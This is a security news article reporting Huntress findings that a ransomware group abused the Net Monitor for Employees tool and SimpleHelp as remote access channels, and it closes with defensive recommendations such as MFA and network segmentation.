Ransomware gangs are using employee monitoring software as a springboard for cyber attacks

Hackers are targeting a popular workforce monitoring tool and using it as a basis for ransomware attacks.

Net Monitor for Employees Professional is a staff productivity tracking tool from NetworkLookout, with features including reverse shell connections, remote desktop control, file management, and the ability to customize service and process names during installation.

In late January and early February, Huntress said its Tactical Response team spotted two separate intrusions in which threat actors chained Net Monitor with SimpleHelp in attempted ransomware attacks.

SimpleHelp is a legitimate remote monitoring and management (RMM) platform widely used by IT teams and managed service providers.

"Shared infrastructure, overlapping IOCs, and consistent tradecraft across both cases strongly suggest a single threat actor or group behind this activity," researchers said.

The threat actors used Net Monitor for Employees as a primary remote access channel, with SimpleHelp used as a redundant persistence layer. This allowed them to blend in with normal traffic, ultimately leading to the attempted – but on these occasions unsuccessful – deployment of Crazy ransomware.

"Threat actors leveraged this capability for hands-on-keyboard reconnaissance, additional tooling delivery, and deploying secondary remote access channels, effectively turning an employee monitoring tool into a fully functional RAT (remote access trojan)," said the team.

In the first case, it's not clear how the attackers gained initial access, but they went on to start trawling around user accounts and attempting to change passwords and create new user accounts. Huntress spotted Net Monitor for Employees' terminal pulling down a file via PowerShell that turned out to be SimpleHelp.

Luckily, attempts to tamper with Windows Defender and deploy multiple versions of Crazy ransomware failed.

In the second case, a threat actor leveraged a compromised vendor's SSL VPN account to gain initial access, then launching an interactive PowerShell session to begin staging their tooling.

They installed SimpleHelp and configured it to monitor for certain keywords.

"Interestingly enough, the SimpleHelp agent was also configured with keyword-based monitoring triggers via GlobalEvents, revealing the threat actor's financial motivation," said the team.

These included wallet services (metamask, exodus, wallet, blockchain), exchanges (binance, bybit, kucoin, bitrue, poloniex, bc.game, noones), blockchain explorers (etherscan, bscscan), and the payment platform payoneer.

How enterprises can shore up defenses

Huntress recommends the use of multi-factor authentication (MFA) on all remote access services, administrative accounts, and external-facing applications and adopting the principle of least privilege.

Networks should be logically separated to prevent lateral movement and all external-facing applications and devices - especially VPN and RDP gateways - should be patched immediately and monitored for anomalous login attempts.

Similarly, third-party software should be regularly audited, with user permissions limited. Elsewhere, Huntress said enterprises should be monitoring for unusual process execution chains and configure alerts for any attempts to modify or disable security software.

Huntress warned these cases highlight a growing trend of threat actors leveraging legitimate, commercially available software to blend into enterprise environments.

"Net Monitor for Employees Professional, while marketed as a workforce monitoring tool, provides capabilities that rival traditional remote access trojans: reverse connections over common ports, process and service name masquerading, built-in shell execution, and the ability to silently deploy via standard Windows installation mechanisms," they wrote.

"When paired with SimpleHelp as a secondary access channel, complete with keyword-based monitoring triggers targeting cryptocurrency activity, the result is a resilient, dual-tool foothold that is difficult to distinguish from legitimate administrative software."

FOLLOW US ON SOCIAL MEDIA

Make sure to follow ITPro on Google News to keep tabs on all our latest news, analysis, and reviews.

You can also follow ITPro on LinkedIn, X, Facebook, and BlueSky.